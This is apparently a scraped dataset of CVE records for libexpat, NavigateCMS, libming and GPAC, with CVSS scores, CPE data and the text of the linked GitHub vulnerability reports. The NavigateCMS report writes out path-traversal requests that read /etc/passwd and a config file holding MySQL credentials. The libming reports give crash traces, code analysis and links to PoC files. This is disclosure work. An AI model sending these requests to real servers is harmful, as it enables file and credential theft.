{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 5.9, "source": "cve@mitre.org", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Patch", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2022/01/17/3" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-484086.pdf" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/libexpat/libexpat/issues/532" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libexpat/libexpat/pull/538" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202209-24" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20220121-0006/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2022/dsa-5073" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.tenable.com/security/tns-2022-05" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Patch", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2022/01/17/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-484086.pdf" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/libexpat/libexpat/issues/532" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libexpat/libexpat/pull/538" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202209-24" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20220121-0006/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2022/dsa-5073" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.tenable.com/security/tns-2022-05" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libexpat_project:libexpat:*:*:*:*:*:*:*:*", "matchCriteriaId": "7A2FBF20-7B2C-49FF-83F8-1EF903078751", "versionEndExcluding": "2.4.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vmware_vsphere:*:*", "matchCriteriaId": "3A756737-1CC4-42C2-A4DF-E1C893B4E2D5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:clustered_data_ontap:-:*:*:*:*:*:*:*", "matchCriteriaId": "1FE996B1-6951-4F85-AA58-B99A379D2163", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:hci_baseboard_management_controller:h610c:*:*:*:*:*:*:*", "matchCriteriaId": "78BE572F-45C1-467F-918F-FB1276F6B495", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:hci_baseboard_management_controller:h610s:*:*:*:*:*:*:*", "matchCriteriaId": "DE7C6010-F736-4BDA-9E3B-C4370BBFA149", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:hci_baseboard_management_controller:h615c:*:*:*:*:*:*:*", "matchCriteriaId": "646FFC2B-6DC4-4BD8-AAE0-81895D397700", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:oncommand_workflow_automation:-:*:*:*:*:*:*:*", "matchCriteriaId": "5735E553-9731-4AAC-BCFF-989377F817B3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:solidfire_\\&_hci_management_node:-:*:*:*:*:*:*:*", "matchCriteriaId": "D6D700C5-F67F-4FFB-BE69-D524592A3D2E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tenable:nessus:*:*:*:*:*:*:*:*", "matchCriteriaId": "C42F5145-1F37-40E2-AD83-495F7012BC3D", "versionEndExcluding": "8.15.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:tenable:nessus:*:*:*:*:*:*:*:*", "matchCriteriaId": "112367D4-EF51-4050-834C-7E887A5C52D9", "versionEndExcluding": "10.1.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "10.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:siemens:sinema_remote_connect_server:*:*:*:*:*:*:*:*", "matchCriteriaId": "98CC9C9A-FE14-4D50-A8EC-C309229356C8", "versionEndExcluding": "3.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "190" ]
190
https://github.com/libexpat/libexpat/issues/532
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "libexpat", "libexpat" ]
On 2021-12-24, a member of [Trend Micro Zero Day Initiative](https://www.zerodayinitiative.com/) ("ZDI") shared a vulnerability named `ZDI-CAN-16157` in libexpat with me that has been discovered by an anonymous individual working with Trend Micro ZDI. I would like to thank both Trend Micro and the anonymous individual for their whitehat work on libexpat security. Thank you! :pray: Similar to ticket #531, the issue is an integer overflow (in multiplication) near a call to `realloc` that takes a ~2 GiB size craft XML file, and then will cause denial of service or more. The issue exists since commit 347e19a6586bfafbbf76186e47758ec0fad3d731 and hence affects even the oldest (pre-)releases. > -- CVSS ----------------------------------------- > > 8.1: AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H > > [..] > > ### Analysis > > This is an integer overflow vulnerability that exists in expat library. The vulnerable function is `doProlog` > ``` > doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end, > int tok, const char *next, const char **nextPtr, XML_Bool haveMore, > XML_Bool allowClosingDoctype, enum XML_Account account) { > #ifdef XML_DTD > static const XML_Char externalSubsetName[] = {ASCII_HASH, '\0'}; > #endif /* XML_DTD */ > static const XML_Char atypeCDATA[] > [...] > case XML_ROLE_GROUP_OPEN: > if (parser->m_prologState.level >= parser->m_groupSize) { > if (parser->m_groupSize) { > { > char *const new_connector = (char *)REALLOC( > parser, parser->m_groupConnector, parser->m_groupSize *= 2);// <-------- (1) > if (new_connector == NULL) { > parser->m_groupSize /= 2; > return XML_ERROR_NO_MEMORY; > } > parser->m_groupConnector = new_connector; > } > > ``` > > - At (1), integer overflow occurs if the value of `m_groupSize` is greater than 0x7FFFFFFF. A pull request and likely a CVE are upcoming, and there will be a soon release 2.4.3. Best, Sebastian
[CVE-2021-46143] Crafted XML file can cause integer overflow on m_groupSize in function doProlog
https://api.github.com/repos/libexpat/libexpat/issues/532/comments
4
2021-12-30T19:25:05Z
2022-01-14T16:53:34Z
https://github.com/libexpat/libexpat/issues/532
1,091,269,758
532
2,947
CVE-2021-44351
2022-01-06T12:15:08.087
An arbitrary file read vulnerability exists in NavigateCMS 2.9 via /navigate/navigate_download.php id parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/NavigateCMS/Navigate-CMS/issues/28" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/NavigateCMS/Navigate-CMS/issues/28" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:naviwebs:navigate_cms:2.9:*:*:*:*:*:*:*", "matchCriteriaId": "5B84FCB0-AA74-4258-B186-491AB6AC304D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/NavigateCMS/Navigate-CMS/issues/28
[ "Exploit", "Third Party Advisory" ]
github.com
[ "NavigateCMS", "Navigate-CMS" ]
## exp after login ,we can see our sid in cookies ![image](https://user-images.githubusercontent.com/38547290/143457734-1d546b85-11a5-4115-ae76-69927d953736.png) for example my sid is 161099c65675803ecc8de95ae08d3e12 then you can get arbitrary file by `/navigate/navigate_download.php?sid=161099c65675803ecc8de95ae08d3e12&id=....//....//....//....//etc/passwd` ![image](https://user-images.githubusercontent.com/38547290/143458062-efc98047-0f7e-497a-ab33-ed28c133624e.png) `/navigate/navigate_download.php?sid=161099c65675803ecc8de95ae08d3e12&id=....//....//cfg/globals.php` you can get some Sensitive information such as mysql user/password ## analysis location:navigate_download.php ![image](https://user-images.githubusercontent.com/38547290/143457171-45600e42-9b42-4629-b58e-5e18f31fa002.png) and in navigate\lib\core\core.php ![image](https://user-images.githubusercontent.com/38547290/143457245-9a2a0162-b825-415e-abd3-420be677405f.png) we can rewrite bypass this filter. ## suggest you can use replace('../', "hacker") rather than replace('../', "")
arbitrary file read vulnerability in NavigateCMS 2.9
https://api.github.com/repos/NavigateCMS/Navigate-CMS/issues/28/comments
1
2021-11-25T14:27:44Z
2021-11-28T16:38:37Z
https://github.com/NavigateCMS/Navigate-CMS/issues/28
1,063,656,210
28
2,948
CVE-2021-44590
2022-01-06T14:15:07.867
In libming 0.4.8, a memory exhaustion vulnerability exist in the function cws2fws in util/main.c. Remote attackers could launch denial of service attacks by submitting a crafted SWF file that exploits this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/libming/libming" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/236" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/libming/libming" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/236" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:libming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "DD92BC79-2548-4C6F-9BDD-26C12BDF68AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "770" ]
770
https://github.com/libming/libming/issues/236
[ "Exploit", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
version: master(commit 04aee52 ) command: listswf $FILE ``` root:/path_to_libming/build/bin# ./listswf poc ==21798==WARNING: AddressSanitizer failed to allocate 0xffffffffb4b4b4b4 bytes ==21798==AddressSanitizer's allocator is terminating the process instead of returning 0 ==21798==If you don't like this behavior set allocator_may_return_null=1 ==21798==AddressSanitizer CHECK failed: /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/sanitizer_common/sanitizer_allocator.cc:225 "((0)) != (0)" (0x0, 0x0) #0 0x4e3385 in __asan::AsanCheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/asan/asan_rtl.cc:69 #1 0x500c45 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/sanitizer_common/sanitizer_termination.cc:79 #2 0x4e9786 in __sanitizer::ReportAllocatorCannotReturnNull() /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/sanitizer_common/sanitizer_allocator.cc:225 #3 0x4e97c6 in __sanitizer::ReturnNullOrDieOnFailure::OnBadRequest() /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/sanitizer_common/sanitizer_allocator.cc:241 #4 0x41fadf in __asan::asan_realloc(void*, unsigned long, __sanitizer::BufferedStackTrace*) /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/asan/asan_allocator.cc:865 #5 0x4da689 in realloc /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:108 #6 0x53815f in cws2fws /path_to_libming/util/main.c:111:15 #7 0x53aacb in readMovieHeader /path_to_libming/util/main.c:198:18 #8 0x539dc3 in main /path_to_libming/util/main.c:350:5 #9 0x7f88a92b5bf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310 #10 0x41a2f9 in _start (/path_to_libming/build/bin/listswf+0x41a2f9) ``` A large integer passed to realloc, causing the allocation failure. The detailed call chain analysis is as follows. Download [poc](https://github.com/dandanxu96/PoC/blob/7cbf5b7f7b62e4a95725a226b29cae362b425ec8/libming/cws2fws-realloc-failure-poc) ```C static int readMovieHeader(FILE *f, int *compressed) { char first; struct stat stat_buf; first = readUInt8 (f); *compressed = (first == ('C')) ? 1 : 0; if (!((first == 'C' || first == 'F') && readUInt8 (f) == 'W' && readUInt8 (f) == 'S')) { SWF_error ("Doesn't look like a swf file to me..\n"); } m.version = readUInt8 (f); m.size = readUInt32 (f); // Read 32 bits from the input file, the m.size is controllable by the attacker m.soundStreamFmt = -1; m.fonts = NULL; m.numFonts = 0; if (*compressed) { #if USE_ZLIB int unzipped = cws2fws (f, m.size); ...... } ...... } int cws2fws(FILE *f, uLong outsize) { struct stat statbuffer; int insize, ret; int err,tmp_fd; Byte *inbuffer,*outbuffer; sprintf(tmp_name, "/tmp/swftoscriptXXXXXX"); #ifdef HAVE_MKSTEMP tmp_fd = mkstemp(tmp_name); #endif #ifndef HAVE_MKSTEMP tmp_fd = open(tmp_name, O_RDWR | O_CREAT | O_TRUNC , 0600); #endif if ( tmp_fd == -1 ) { SWF_error("Couldn't create tempfile.\n"); } tempfile = fdopen(tmp_fd, "w+"); if ( ! tempfile ) { SWF_error("fdopen: %s", strerror(errno)); } if( stat(filename, &statbuffer) == -1 ) { SWF_error("stat() failed on input file"); } insize = statbuffer.st_size-8; inbuffer = malloc(insize); if(!inbuffer){ SWF_error("malloc() failed"); } if ( ! fread(inbuffer, insize, 1, f) ) { SWF_error("Error reading input file"); } outbuffer=NULL; do{ outbuffer = realloc(outbuffer, outsize); // outsize is controlled by the attacker, and it is directly passed to realloc without any boundary check, resulting in allocation failure ...... }while(err == Z_BUF_ERROR); ...... } ```
Memory allocation failure in cws2fws
https://api.github.com/repos/libming/libming/issues/236/comments
0
2021-12-01T06:02:37Z
2021-12-01T06:02:37Z
https://github.com/libming/libming/issues/236
1,067,997,303
236
2,949
CVE-2021-44591
2022-01-06T14:15:07.917
In libming 0.4.8, the parseSWF_DEFINELOSSLESS2 function in util/parser.c lacks a boundary check that would lead to denial-of-service attacks via a crafted SWF file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/libming/libming" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/235" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/libming/libming" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/235" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:libming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "DD92BC79-2548-4C6F-9BDD-26C12BDF68AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "770" ]
770
https://github.com/libming/libming/issues/235
[ "Exploit", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
version: master(commit [04aee52](https://github.com/libming/libming/commit/04aee52363688426eab74f5d6180c149654a6473) ) command: listswf $FILE ``` root:/path_to_libming/build/bin# ./listswf poc ==26225==WARNING: AddressSanitizer failed to allocate 0xfffffffffffffff9 bytes ==26225==AddressSanitizer's allocator is terminating the process instead of returning 0 ==26225==If you don't like this behavior set allocator_may_return_null=1 ==26225==AddressSanitizer CHECK failed: /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/sanitizer_common/sanitizer_allocator.cc:225 "((0)) != (0)" (0x0, 0x0) #0 0x4e3385 in __asan::AsanCheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/asan/asan_rtl.cc:69 #1 0x500c45 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/sanitizer_common/sanitizer_termination.cc:79 #2 0x4e9786 in __sanitizer::ReportAllocatorCannotReturnNull() /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/sanitizer_common/sanitizer_allocator.cc:225 #3 0x4e97c6 in __sanitizer::ReturnNullOrDieOnFailure::OnBadRequest() /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/sanitizer_common/sanitizer_allocator.cc:241 #4 0x41f676 in __asan::asan_malloc(unsigned long, __sanitizer::BufferedStackTrace*) /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/asan/asan_allocator.cc:856 #5 0x4da20b in malloc /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:89 #6 0x5b7e7e in readBytes /path_to_libming/util/read.c:252:17 #7 0x59b963 in parseSWF_DEFINELOSSLESS2 /path_to_libming/util/parser.c:2168:38 #8 0x546cf9 in blockParse /path_to_libming/util/blocktypes.c:145:14 #9 0x53bc13 in readMovie /path_to_libming/util/main.c:269:11 #10 0x53a0d6 in main /path_to_libming/util/main.c:354:2 #11 0x7fce52d93bf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310 #12 0x41a2f9 in _start (/path_to_libming/build/bin/listswf+0x41a2f9) ``` The cause of this bug is the lack of boundary checks. Specifically, in the `parseSWF_DEFINELOSSLESS2` function, the size of `end` and `fileOffset` is not compared when `readBytes` is called. As a result, `end-fileOffset` may be a negative integer, which eventually leads to allocation failure. The detailed call chain analysis is as follows. Download [poc](https://github.com/dandanxu96/PoC/blob/7cbf5b7f7b62e4a95725a226b29cae362b425ec8/libming/parseSWF_DEFINELOSSLESS2-readBytes-malloc-failure-poc) ```C static void readMovie(FILE *f) { int block, type, length, nextFrame=0; SWF_Parserstruct *blockp; for (;;) { if(filelen_check_fails(2)) break; // Read 16 bits from the input file, the block is controlled by the attacker block = readUInt16 (f); type = block >> 6; // length = block & 0x3f, which means length<=3f length = block & ((1 << 6) - 1); if (length == 63) /* it's a long block. */ { if(filelen_check_fails(4)) break; unsigned long real_length = readUInt32 (f); if (real_length > INT_MAX) { SWF_warn(" Could not process long block with length %lu:" " blocks with length > %d not supported on this system\n", real_length, INT_MAX); continue; } else { length = (int) real_length; } } nextFrame = fileOffset+length; if(filelen_check_fails(length)) break; blockp= blockParse(f, length, type); ...... } ...... } SWF_Parserstruct * blockParse (FILE *f, int length, SWFBlocktype header) { int i; for (i = 0; i < numBlocks; i++) { // Select the corresponding parser to parse if (blocks[i].type == header) { return blocks[i].parser(f,length); } } return parseSWF_UNKNOWNBLOCK(f, length); } SWF_Parserstruct * parseSWF_DEFINELOSSLESS2 (FILE * f, int length) { int end = fileOffset + length; PAR_BEGIN (SWF_DEFINELOSSLESS2); parserrec->CharacterID = readUInt16 (f); // Read 16 bits from the input file, and fileOffset = fileOffset+2 parserrec->BitmapFormat = readUInt8 (f); // Read 8 bits from the input file, and fileOffset = fileOffset+1 parserrec->BitmapWidth = readUInt16 (f); // Read 16 bits from the input file, and fileOffset = fileOffset+2 parserrec->BitmapHeight = readUInt16 (f); Read 16 bits from the input file, and fileOffset = fileOffset+2 if( parserrec->BitmapFormat == 3 /* 8-bit */ ) { parserrec->BitmapColorTableSize = readUInt8 (f); } // When length=0, at this moment end=Old_fileOffset, fileOffset=Old_fileOffset+7, then end-fileOffset will be equal to -7 which is a negative integer parserrec->ZlibBitmapData = (UI8 *)readBytes (f,end-fileOffset); PAR_END; } char *readBytes(FILE *f, unsigned long size) { if (size < 1) { #if DEBUG SWF_warn("readBytes: want to read %lu < 1 bytes: Handling a 0\n", size); #endif size = 0; } unsigned long i; char *buf; // The parameter size's type is unsigned long. Given a negative integer as input, it will be treated as a large unsigned integer and passed to malloc, causing allocation failures. buf = (char *)malloc(sizeof(char)*size); if (buf == NULL) { fprintf(stderr, "readBytes: Failed to allocate %lu bytes", sizeof(char) * size); exit(-1); } for(i=0;i<size;i++) { buf[i]=(char)readUInt8(f); } return buf; } ```
Memory allocation failure caused by the missing boundary check in parseSWF_DEFINELOSSLESS2
https://api.github.com/repos/libming/libming/issues/235/comments
0
2021-12-01T05:31:44Z
2021-12-01T05:31:44Z
https://github.com/libming/libming/issues/235
1,067,981,255
235
2,950
CVE-2021-46039
2022-01-06T20:15:08.657
A Pointer Dereference Vulnerabilty exists in GPAC 1.0.1 via the shift_chunk_offsets.part function, which causes a Denial of Service (context-dependent).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1999" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1999" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1999
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
